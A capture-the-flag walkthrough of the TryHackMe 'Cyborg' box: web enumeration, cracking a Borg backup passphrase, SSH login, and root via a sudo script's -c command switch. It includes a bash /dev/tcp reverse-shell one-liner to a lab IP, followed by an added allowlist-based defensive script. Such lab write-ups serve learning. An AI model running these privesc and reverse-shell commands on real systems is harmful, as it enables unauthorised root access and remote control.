A box involving encrypted archives, source code analysis and more.
This is Cyborg from THM. It’s easy rated. I’ve been fighting Sustah but keep getting stonewalled, so let’s try this one.
SSH and HTTP only.
The front page is the Apache default page, so it’s dirsearch to the rescue:
root@kali:/opt/tryhackme/cyborg# python3 /opt/dirsearch/dirsearch.py -u http://10.10.181.14
Dirsearch finds a few things:
[21:15:00] 200 - 6KB - /admin/
[21:15:35] 301 - 310B - /etc -> http://10.10.181.14/etc/
[21:15:35] 200 - 927B - /etc/
[21:15:42] 200 - 11KB - /index.html
At ‘admin’ we find a personal page/portfolio thing, with a few links, most of which don’t do anything. However, the link for Archive > Download is real and points at:
This extracts to a directory containing a bunch of stuff including a file called README which helpfully says:
This is a Borg Backup repository.
Never heard of it before. What is it?
BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.
Okey dokey; let’s install it:
Since I don’t know how to use it, I’d better read the docs. From these we can see how to list the repo:
And we can also see how to mount it to a directory:
However, in order to do this we need a passphrase. Fortunately we have one that we found in the /etc web directory. It’s hashed, but John cracks it and we are in.
Once we’ve mounted the backup we can look around and find some credentials for our user.
Once we SSH in as Alex, we find out what he can do:
What does all that mean? We’ve got a script that we can run as root, and inside this block:
We have the ability to pass optional commands to the script with the -c switch; this is our privesc.
alex@ubuntu:/etc/mp3backups$ sudo -u root /etc/mp3backups/backup.sh -c id
Produces the normal output of the script along with:
uid=0(root) gid=0(root) groups=0(root)
Cool. So now let’s do this:
alex@ubuntu:/etc/mp3backups$ sudo -u root /etc/mp3backups/backup.sh -c /bin/bash
And I get a root shell, but no output for some reason:
Well, that’s annoying. Let’s see if I can send myself a root shell then:
root@ubuntu:/root# bash -i >& /dev/tcp/10.9.10.123/1234 0>&1
That’s a yes. Thanks for playing, and back to Sustah.
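For the defender’s side of this, here is an added example (my own, not the box’s actual backup.sh, whose contents aren’t shown above) of how a sudo-run script can still take a -c switch without becoming a privesc: -c selects a named action from a fixed allowlist instead of being executed as a command. The action names and paths are made up for illustration.

```shell
#!/bin/sh
# Added example, not the box's backup.sh: route "-c" through an allowlist
# of named actions so a sudo caller can never supply an arbitrary command.

# Map an allowlisted action name to the exact command it runs (assumed names/paths).
action_command() {
    case "$1" in
        checksum) echo "sha256sum /var/backups/music.tar" ;;
        list)     echo "ls -l /var/backups" ;;
        *)        return 1 ;;
    esac
}

# Validate a "-c" value: only short lowercase words from the allowlist pass.
# Prints the command to run and returns 0, or prints nothing and returns 1.
resolve_action() {
    name="$1"
    case "$name" in
        ''|*[!a-z]*) return 1 ;;   # rejects paths, spaces, ';', '$', etc.
    esac
    action_command "$name"
}

# Parse options like the original script, but -c is resolved, never executed raw.
# Prints the resolved command (or "no action") on success; returns 1 if refused.
parse_args() {
    action=""
    OPTIND=1
    while getopts "c:" opt "$@"; do
        case "$opt" in
            c) action="$OPTARG" ;;
            *) return 2 ;;
        esac
    done
    [ -n "$action" ] || { echo "no action"; return 0; }
    resolve_action "$action"
}

# Execute only what the allowlist resolved to; anything else is refused and logged.
run_action() {
    cmd=$(resolve_action "$1") || { logger -t backup "refused -c value from $(id -un)"; return 1; }
    $cmd
}
```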